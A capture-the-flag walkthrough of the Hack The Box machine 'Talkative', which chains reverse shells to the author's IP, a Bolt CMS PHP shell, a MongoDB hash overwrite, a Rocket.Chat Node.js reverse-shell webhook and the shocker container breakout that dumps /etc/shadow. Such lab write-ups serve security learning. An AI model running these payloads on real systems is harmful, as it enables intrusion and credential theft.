Hack-The-Box-walkthrough[talkactive]

introduce

OS: Linux
Difficulty: Hard
Points: 40
Release: 09 Apr 2022
IP: 10.10.11.155

  • my htb rank

Enumeration

NMAP

1
2
3
4
5
6
7
8
┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.155
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52
3000/tcp open ppp?
8080/tcp open http Tornado httpd 5.0
8081/tcp open http Tornado httpd 5.0
8082/tcp open http Tornado httpd 5.0

we found several web service:

  • Bolt CMS

  • jamovi 0.9.5.5

  • ROCKET.CHAT

initial shell

go to :8080, open RJ editor add this line excecute ruby command to get a shell. =>

1
system("bash -c 'bash -i >& /dev/tcp/10.10.14.18/9001 0>&1'",intern=TRUE)

and we found a .omv file, just download and extract it and u will get creds.

i used pwncat, so it could download or upload files easily

  • pwncat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
(remote) root@b06821bbda78:/root# ls
Documents bolt-administration.omv
(local) pwncat$ download /root/bolt-administration.omv ./bolt-administration.omv
/root/bolt-administration.omv ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 2.2/2.2 KB • ? • 0:00:00
[09:41:08] downloaded 2.19KiB in 2.86 seconds

┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# file bolt-administration.omv
bolt-administration.omv: Zip archive data, at least v2.0 to extract, compression method=deflate
┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# unzip bolt-administration.omv
Archive: bolt-administration.omv
inflating: META-INF/MANIFEST.MF
inflating: meta
inflating: index.html
inflating: metadata.json
inflating: xdata.json
inflating: data.bin
inflating: 01 empty/analysis
┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# cat xdata.json | jq .
{
"A": {
"labels": [
[
0,
"Username",
"Username",
false
],
[
1,
"matt@talkative.htb",
"matt@talkative.htb",
false
],
[
2,
"janit@talkative.htb",
"janit@talkative.htb",
false
],
[
3,
"saul@talkative.htb",
"saul@talkative.htb",
false
]
]
},
"B": {
"labels": [
[
0,
"Password",
"Password",
false
],
[
1,
"jeO09ufhWD<s",
"jeO09ufhWD<s",
false
],
[
2,
"bZ89h}V<S_DA",
"bZ89h}V<S_DA",
false
],
[
3,
")SQWGm>9KHEA",
")SQWGm>9KHEA",
false
]
]
},
"C": {
"labels": []
}
}

now Go to :80, /bolt login with the creds:

1
admin:jeO09ufhWD<s

now Modify the http://talkative.htb/bolt/file-edit/config?file=/bundles.php bundles file, add a PHP rev shell, u will get shell on another container.

on the container as www-data, use ssh to login on main host ssh saul@172.18.0.1 with the same bolt password

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# pwncat-cs -lp 1234
[09:52:38] Welcome to pwncat 🐈! __main__.py:164
[09:54:49] received connection from 10.10.11.155:60622 bind.py:84
[09:54:56] 0.0.0.0:1234: upgrading from /bin/dash to /bin/bash manager.py:957
[09:54:59] 10.10.11.155:60622: registered new host w/ db manager.py:957
(local) pwncat$ back
(remote) www-data@ad8ae3998918:/$ ls
bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
(remote) www-data@ad8ae3998918:/$ ssh saul@172.18.0.1
The authenticity of host '172.18.0.1 (172.18.0.1)' can't be established.
ECDSA key fingerprint is SHA256:kUPIZ6IPcxq7Mei4nUzQI3JakxPUtkTlEejtabx4wnY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/var/www/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
saul@172.18.0.1's password:
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-81-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun 10 Apr 2022 01:56:50 PM UTC

System load: 0.0
Usage of /: 78.5% of 8.80GB
Memory usage: 70%
Swap usage: 2%
Processes: 392
Users logged in: 1
IPv4 address for br-ea74c394a147: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.10.11.155
IPv6 address for eth0: dead:beef::250:56ff:feb9:3aae


18 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Apr 10 12:46:40 2022 from 172.17.0.13
saul@talkative:~$ id
uid=1000(saul) gid=1000(saul) groups=1000(saul)
saul@talkative:~$ whoami
saul
saul@talkative:~$ cat user.txt
e2503f45e99ee3fec7c7a4f44c5c87ed

and we get our user flag

move on to root

pspy found some interesting process

1
2
3
4
2022/04/09 21:31:01 CMD: UID=0    PID=79640  | /bin/sh -c cp /root/.backup/passwd /etc/passwd 
2022/04/09 21:31:01 CMD: UID=0 PID=84170 | cp /root/.backup/shadow /etc/shadow
2022/04/09 21:51:01 CMD: UID=0 PID=84169 | python3 /root/.backup/update_mongo.py
2022/04/09 21:51:01 CMD: UID=0 PID=84172 | python3 /root/.backup/update_mongo.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
tcp        0      0 172.17.0.1:6000         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6001 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:8081 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6002 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:8082 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6003 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6004 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6005 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6006 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6007 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6008 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6009 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6010 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6011 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6012 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6013 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6014 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6015 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.18.0.1:22 172.17.0.13:37184 ESTABLISHED keepalive (6455.50/0/0)
tcp6 0 0 :::8080 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::8081 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::8082 :::* LISTEN off (0.00/0/0)
udp 0 0 127.0.0.1:39995 127.0.0.53:53 ESTABLISHED off (0.00/0/0)

after ip range and port scan, we known, now use chisel port forward mongo DB 172.17.0.2:27017 and change admins password for rocket.chat

  • chisel
1
2
3
4
5
saul@talkative:~$ ./chisel client 10.10.14.18:4444 R:27017:172.17.0.2:27017 &
[1] 6493
saul@talkative:~$ 2022/04/10 14:13:52 client: Connecting to ws://10.10.14.18:4444

saul@talkative:~$ 2022/04/10 14:13:55 client: Connected (Latency 371.579937ms)
1
2
3
4
5
6
┌──(root💀kali)-[~/hackthebox/endgame/ascension]
└─# ./chisel server -p 4444 --reverse
2022/04/10 06:04:31 server: Reverse tunnelling enabled
2022/04/10 06:04:31 server: Fingerprint YV//bCvnlszVb4QzNq2stvLbKxLfQ33OQ4mKu6Y5zME=
2022/04/10 06:04:31 server: Listening on http://0.0.0.0:4444
2022/04/10 06:04:37 server: session#1: tun: proxy#R:27017=>172.17.0.2:27017: Listening

now we have to install mongosh to connect to mongodb, and enum some information:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
$ wget https://downloads.mongodb.com/compass/mongodb-mongosh_1.3.1_amd64.deb
$ dpkg -i mongodb-mongosh_1.3.1_amd64.deb
┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# mongosh "mongodb://LOCALHOST:27017"
Current Mongosh Log ID: 6252e6b51f6c27d3c8cfc72a
Connecting to: mongodb://LOCALHOST:27017/?directConnection=true&appName=mongosh+1.3.1
Using MongoDB: 4.0.26
Using Mongosh: 1.3.1

For mongosh info see: https://docs.mongodb.com/mongodb-shell/

------
The server generated these startup warnings when booting:
2022-04-10T12:32:16.345+0000:
2022-04-10T12:32:16.345+0000: ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
2022-04-10T12:32:16.345+0000: ** See http://dochub.mongodb.org/core/prodnotes-filesystem
2022-04-10T12:32:18.390+0000:
2022-04-10T12:32:18.390+0000: ** WARNING: Access control is not enabled for the database.
2022-04-10T12:32:18.390+0000: ** Read and write access to data and configuration is unrestricted.
2022-04-10T12:32:18.391+0000:
------

rs0 [direct: primary] test> show databases
admin 106 kB
config 160 kB
local 11.9 MB
meteor 5.08 MB
rs0 [direct: primary] test> use admin
switched to db admin
rs0 [direct: primary] admin> show tables
system.keys
system.version
rs0 [direct: primary] admin> db.system.keys.find()
[
{
_id: Long("6994889321446637571"),
purpose: 'HMAC',
key: Binary(Buffer.from("6def3ebf131b6d0197852202f4908cf0f279016e", "hex"), 0),
expiresAt: Timestamp({ t: 1636400583, i: 0 })
},
{
_id: Long("6994889321446637572"),
purpose: 'HMAC',
key: Binary(Buffer.from("52057603cc02d6cf032aa2d1dc592ad3f8889b06", "hex"), 0),
expiresAt: Timestamp({ t: 1644176583, i: 0 })
},
{
_id: Long("7064639126477209602"),
purpose: 'HMAC',
key: Binary(Buffer.from("8d89fa517f7aaf2813b681aa0e63bcae2a3238cc", "hex"), 0),
expiresAt: Timestamp({ t: 1652640475, i: 0 })
},
{
_id: Long("7064639126477209603"),
purpose: 'HMAC',
key: Binary(Buffer.from("ede2184b2b29a5eb05cca53adb9246b73dc3c90f", "hex"), 0),
expiresAt: Timestamp({ t: 1660416475, i: 0 })
}
]
rs0 [direct: primary] admin> use meteor
switched to db meteor
rs0 [direct: primary] meteor> db.users.find()
[
{
_id: 'rocket.cat',
createdAt: ISODate("2021-08-10T19:44:00.224Z"),
avatarOrigin: 'local',
name: 'Rocket.Cat',
username: 'rocket.cat',
status: 'online',
statusDefault: 'online',
utcOffset: 0,
active: true,
type: 'bot',
_updatedAt: ISODate("2021-08-10T19:44:00.615Z"),
roles: [ 'bot' ]
},
{
_id: 'ZLMid6a4h5YEosPQi',
createdAt: ISODate("2021-08-10T19:49:48.673Z"),
services: {
password: {
bcrypt: '$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG'
},
resume: {
loginTokens: [
{
when: ISODate("2022-04-10T13:00:11.904Z"),
hashedToken: 'n3ZC1SRtuFsYyAAcaelzbdMkwWv7bI4IONsiahBenNI='
}
]
}
},
emails: [ { address: 'saul@talkative.htb', verified: false } ],
type: 'user',
status: 'offline',
active: true,
_updatedAt: ISODate("2022-04-10T13:59:52.416Z"),
roles: [ 'admin', 'bot' ],
name: 'Saul Goodman',
lastLogin: ISODate("2022-04-10T13:00:11.897Z"),
statusConnection: 'offline',
username: 'admin',
utcOffset: 0
}
]

now we could update admin’s bcrypt hash to change the password:

1
2
3
4
5
6
7
8
9
rs0 [direct: primary] meteor> db.getCollection('users').update({username:"admin"}, { $set: {"services" : { "password" : {"bcrypt" : "$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG" } } } })
DeprecationWarning: Collection.update() is deprecated. Use updateOne, updateMany, or bulkWrite.
{
acknowledged: true,
insertedId: null,
matchedCount: 1,
modifiedCount: 1,
upsertedCount: 0
}

then use: admin/12345 to login into rocket.chat pannel

we found target is rocket.chat 2.4.14, is vulnerable

  • Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated)

  • CVE-2021-22911

we can change the following to rev shell:

1
2
3
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec('command here');
1
2
3
4
5
6
7
8
const require = console.log.constructor('return process.mainModule.require')();
var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(1234, "10.10.14.18", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});

then go to: http://talkative.htb:3000/admin/integrations/new, select “Incoming WebHook Integration”

fill in like following pics:

then copy this url, curl it, we got a shell in a container again

1
2
3
┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# curl http://talkative.htb:3000/hooks/23fvWJGcJ7b47SGHy/PWHLFZoXrTQLpM5fT2GMzAgxBNhXKD7k3QD3K8nkHcXWAkEZ
{"success":false}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# pwncat-cs -lp 1234
[10:45:00] Welcome to pwncat 🐈! __main__.py:164
[10:45:08] received connection from 10.10.11.155:46286 bind.py:84
[10:45:16] 0.0.0.0:1234: upgrading from /bin/dash to /bin/bash manager.py:957
[10:45:20] 10.10.11.155:46286: registered new host w/ db manager.py:957
(local) pwncat$ back
(remote) root@c150397ccd63:/app/bundle/programs/server# ls
app boot.js.map mini-files.js.map npm-rebuild.js npm-shrinkwrap.json program.json
assets config.json node_modules npm-rebuild.js.map package.json runtime.js
boot-utils.js debug.js npm npm-rebuilds.json packages runtime.js.map
boot-utils.js.map debug.js.map npm-rebuild-args.js npm-require.js profile.js server-json.js
boot.js mini-files.js npm-rebuild-args.js.map npm-require.js.map profile.js.map server-json.js.map
(remote) root@c150397ccd63:/app/bundle/programs/server# id
uid=0(root) gid=0(root) groups=0(root)
(remote) root@c150397ccd63:/app/bundle/programs/server# whoami
root

after run some linux enum script, found capabilities cap_dac_read_search

  • shocker: docker PoC VMM-container breakout

first Modify the file, then we compile it in our attack kali machine:

1
2
3
4
5
6
// get a FS reference from something mounted in from outside
if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
die("[-] open");

if (find_handle(fd1, "/root/root.txt", &root_h, &h) <= 0)
die("[-] Cannot find valid handle!");
  • Dynamic compilation
1
gcc shocker.c -o shocker
  • Static compilation
1
cc -Wall -std=c99 -O2 shocker.c -static

then upload these binary, then execute it

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
(local) pwncat$ upload ./a.out /root/static
/root/static ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 824.1/824.1 KB • ? • 0:00:00
[10:53:06] uploaded 824.11KiB in 13.93 seconds upload.py:76
(local) pwncat$ upload ./shocker /root/shocker
/root/shocker ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 17.2/17.2 KB • ? • 0:00:00
[10:53:48] uploaded 17.21KiB in 4.49 seconds upload.py:76
(local) pwncat$ upload ./shadow /root/shadow
/root/shadow ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 17.2/17.2 KB • ? • 0:00:00
[10:53:57] uploaded 17.21KiB in 4.49 seconds upload.py:76
(local) pwncat$ back
(remote) root@c150397ccd63:/root# chmod 777 *
(remote) root@c150397ccd63:/root# ./static
[***] docker VMM-container breakout Po(C) 2014 [***]
[***] The tea from the 90's kicks your sekurity again. [***]
[***] If you have pending sec consulting, I'll happily [***]
[***] forward to my friends who drink secury-tea too! [***]

<enter>

[*] Resolving 'root/root.txt'
[*] Found lib32
[*] Found ..
[*] Found lost+found
[*] Found sbin
[*] Found bin
[*] Found boot
[*] Found dev
[*] Found run
[*] Found lib64
[*] Found .
[*] Found var
[*] Found home
[*] Found media
[*] Found proc
[*] Found etc
[*] Found lib
[*] Found libx32
[*] Found cdrom
[*] Found root
[+] Match: root ino=18
[*] Brute forcing remaining 32bit. This can take a while...
[*] (root) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
[*] Resolving 'root.txt'
[*] Found ..
[*] Found .backup
[*] Found .config
[*] Found .cache
[*] Found .local
[*] Found .ssh
[*] Found .
[*] Found .profile
[*] Found .bashrc
[*] Found root.txt
[+] Match: root.txt ino=110097
[*] Brute forcing remaining 32bit. This can take a while...
[*] (root.txt) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x11, 0xae, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Got a final handle!
[*] #=8, 1, char nh[] = {0x11, 0xae, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Win! /etc/shadow output follows:
99a37c0a5b01ffc4ad1204d0dd1bc884

(remote) root@c150397ccd63:/root# ./shadow
[***] docker VMM-container breakout Po(C) 2014 [***]
[***] The tea from the 90's kicks your sekurity again. [***]
[***] If you have pending sec consulting, I'll happily [***]
[***] forward to my friends who drink secury-tea too! [***]

<enter>

[*] Resolving 'etc/shadow'
[*] Found lib32
[*] Found ..
[*] Found lost+found
[*] Found sbin
[*] Found bin
[*] Found boot
[*] Found dev
[*] Found run
[*] Found lib64
[*] Found .
[*] Found var
[*] Found home
[*] Found media
[*] Found proc
[*] Found etc
[+] Match: etc ino=393217
[*] Brute forcing remaining 32bit. This can take a while...
[*] (etc) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x01, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00};
[*] Resolving 'shadow'
[*] Found modules-load.d
[*] Found lsb-release
[*] Found rsyslog.conf
[*] Found rc6.d
[*] Found calendar
[*] Found fstab
[*] Found shadow
[+] Match: shadow ino=393228
[*] Brute forcing remaining 32bit. This can take a while...
[*] (shadow) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x0c, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Got a final handle!
[*] #=8, 1, char nh[] = {0x0c, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Win! /etc/shadow output follows:
root:$6$9GrOpvcijuCP93rg$tkcyh.ZwH5w9AHrm66awD9nLzMHv32QqZYGiIfuLow4V1PBkY0xsKoyZnM3.AI.yGWfFLOFDSKsIR9XnKLbIY1:19066:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::
sys:*:18659:0:99999:7:::
sync:*:18659:0:99999:7:::
games:*:18659:0:99999:7:::
man:*:18659:0:99999:7:::
lp:*:18659:0:99999:7:::
mail:*:18659:0:99999:7:::
news:*:18659:0:99999:7:::
uucp:*:18659:0:99999:7:::
proxy:*:18659:0:99999:7:::
www-data:*:18659:0:99999:7:::
backup:*:18659:0:99999:7:::
list:*:18659:0:99999:7:::
irc:*:18659:0:99999:7:::
gnats:*:18659:0:99999:7:::
nobody:*:18659:0:99999:7:::
systemd-network:*:18659:0:99999:7:::
systemd-resolve:*:18659:0:99999:7:::
systemd-timesync:*:18659:0:99999:7:::
messagebus:*:18659:0:99999:7:::
syslog:*:18659:0:99999:7:::
_apt:*:18659:0:99999:7:::
tss:*:18659:0:99999:7:::
uuidd:*:18659:0:99999:7:::
tcpdump:*:18659:0:99999:7:::
landscape:*:18659:0:99999:7:::
pollinate:*:18659:0:99999:7:::
usbmux:*:18849:0:99999:7:::
sshd:*:18849:0:99999:7:::
systemd-coredump:!!:18849::::::
lxd:!:18849::::::
saul:$6$19rUyMaBLt7.CDGj$ik84VX1CUhhuiMHxq8hSMjKTDMxHt.ldQC15vFyupafquVyonyyb3/S6MO59tnJHP9vI5GMvbE9T4TFeeeKyg1:19058:0:99999:7:::

we see both Dynamic compilation and Static compilation file works, we are done

Summary of knowledge

  • RJ editor get shell
  • pwncat upload and download files
  • bolt cms get shell
  • chisel port forward MongoDB 27017 port
  • update admin’s bcrypt hash to change the password
  • rocket.chat rce
  • shocker: docker PoC VMM-container breakout to get root flag

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…